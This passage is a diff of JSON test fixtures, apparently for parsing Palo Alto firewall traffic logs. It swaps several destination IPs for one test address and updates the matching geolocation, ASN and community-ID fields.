"192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -7854,7 +7925,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.252.247" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", @@ -7876,7 +7947,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:vx03vuDn4sh2/e89Lm3RoSpVIVM=" + "community_id": "1:vEitYeyF8bJL6Pi+vgkJHZyK3tQ=" } }, "sequence_number": 32091159, @@ -7896,8 +7967,8 @@ ], "network": { "community_id": [ - "1:LeVVxJ/qJ69xMnerDRfh9DhS1wg=", - "1:vx03vuDn4sh2/e89Lm3RoSpVIVM=" + "1:LtxRBUlwuZn5CHB4FiQ9BVaNsRQ=", + "1:vEitYeyF8bJL6Pi+vgkJHZyK3tQ=" ], "transport": "tcp", "application": "ssl", @@ -7937,14 +8008,14 @@ ], "ip": [ "192.168.15.224", - "184.51.252.247", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 13000000000, - "ingested": "2021-09-08T12:40:05.941956662Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031689300Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -7967,25 +8038,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.94.140" + "ip": "175.16.199.1" }, "geo": { "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Asia Pacific Region", + "region_name": "Jilin", "location": { - "lon": 105.0, - "lat": 35.0 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 11136, - "ip": "35.201.94.140", + "ip": "175.16.199.1", "packets": 16 }, "rule": { @@ -8004,7 +8079,7 @@ "packets": 15, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8019,7 +8094,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.201.94.140" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -8041,7 +8116,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:u1uvQ3wfJoaG/nNiBhvQMHQSVlU=" + "community_id": "1:lfS/LUe+Z+UcduOHVTp1yk5QK/s=" } }, "sequence_number": 32091160, @@ -8061,8 +8136,8 @@ ], "network": { "community_id": [ - "1:b6jBmvbfVzb1LGTW2RD80kK1rMs=", - "1:u1uvQ3wfJoaG/nNiBhvQMHQSVlU=" + "1:zJ4K4fy0UYUM5GypnCl8lDxoN70=", + "1:lfS/LUe+Z+UcduOHVTp1yk5QK/s=" ], "transport": "tcp", "application": "ssl", @@ -8102,14 +8177,14 @@ ], "ip": [ "192.168.15.224", - "35.201.94.140", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 8000000000, - "ingested": "2021-09-08T12:40:05.941960215Z", - "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031694700Z", + "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8132,27 +8207,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -8171,7 +8248,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8186,7 +8263,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8258,14 +8335,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941963755Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031700100Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8288,27 +8365,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 144, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8327,7 +8406,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8342,7 +8421,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8364,7 +8443,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:lz0ZCL4R4wwyqmvefpkiJk7yR18=" + "community_id": "1:YBygWfVh+uJolv6zNydx888KbBc=" } }, "sequence_number": 32091162, @@ -8384,8 +8463,8 @@ ], "network": { "community_id": [ - "1:jK1/samUe1w5J1uVlmH7SIXX1YE=", - "1:lz0ZCL4R4wwyqmvefpkiJk7yR18=" + "1:v3ioLfu0OhYbpmhlhNN2kLb6irc=", + "1:YBygWfVh+uJolv6zNydx888KbBc=" ], "transport": "udp", "application": "dns", @@ -8425,14 +8504,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941967352Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031705300Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8455,27 +8534,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8494,7 +8575,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8509,7 +8590,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8531,7 +8612,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=" + "community_id": "1:YJceH5rZcz1VbKygrm/qccp9Ess=" } }, "sequence_number": 32091163, @@ -8551,8 +8632,8 @@ ], "network": { "community_id": [ - "1:pe+tF7SEY/Km9LRsrGI4UWHmV8E=", - "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=" + "1:w8XnxnTMQAhm5sOtGkm43MuGB1Y=", + "1:YJceH5rZcz1VbKygrm/qccp9Ess=" ], "transport": "udp", "application": "dns", @@ -8592,14 +8673,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941970878Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031708500Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8622,27 +8703,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 206, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8661,7 +8744,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8676,7 +8759,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8698,7 +8781,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:twx1eOqehbazvI0g0nkTeVynrY0=" + "community_id": "1:MaNPtaexrtBDiK1FqZV47sf+niI=" } }, "sequence_number": 32091164, @@ -8718,8 +8801,8 @@ ], "network": { "community_id": [ - "1:qHh6xeCGBZ5pLwaBsFDRVbP5MZU=", - "1:twx1eOqehbazvI0g0nkTeVynrY0=" + "1:t6loEqKMys5Konp+NIaNnuyNaT8=", + "1:MaNPtaexrtBDiK1FqZV47sf+niI=" ], "transport": "udp", "application": "dns", @@ -8759,14 +8842,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941974358Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031712800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8789,27 +8872,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 169, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8828,7 +8913,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -8843,7 +8928,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -8865,7 +8950,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=" + "community_id": "1:WD+GaCUhMujDfHSy7AUahHp1vWw=" } }, "sequence_number": 32091165, @@ -8885,8 +8970,8 @@ ], "network": { "community_id": [ - "1:7yZMN4i1Gxii2+FmEtBbvDk3lvA=", - "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=" + "1:IIfOFVIY3zfc25N4A7SFL5AUzm8=", + "1:WD+GaCUhMujDfHSy7AUahHp1vWw=" ], "transport": "udp", "application": "dns", @@ -8926,14 +9011,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941977818Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031717800Z", + "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -8956,27 +9041,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 132, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8995,7 +9082,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -9010,7 +9097,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -9032,7 +9119,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=" + "community_id": "1:bCQJCkKJt9w1kBS55QCraj9ey+M=" } }, "sequence_number": 32091166, @@ -9052,8 +9139,8 @@ ], "network": { "community_id": [ - "1:0vV/bWp15XA8ntbAvsV9+ktbx6E=", - "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=" + "1:qPlhIGArJXmoBhQVuxsknAhz2gI=", + "1:bCQJCkKJt9w1kBS55QCraj9ey+M=" ], "transport": "udp", "application": "dns", @@ -9093,14 +9180,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941981346Z", - "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 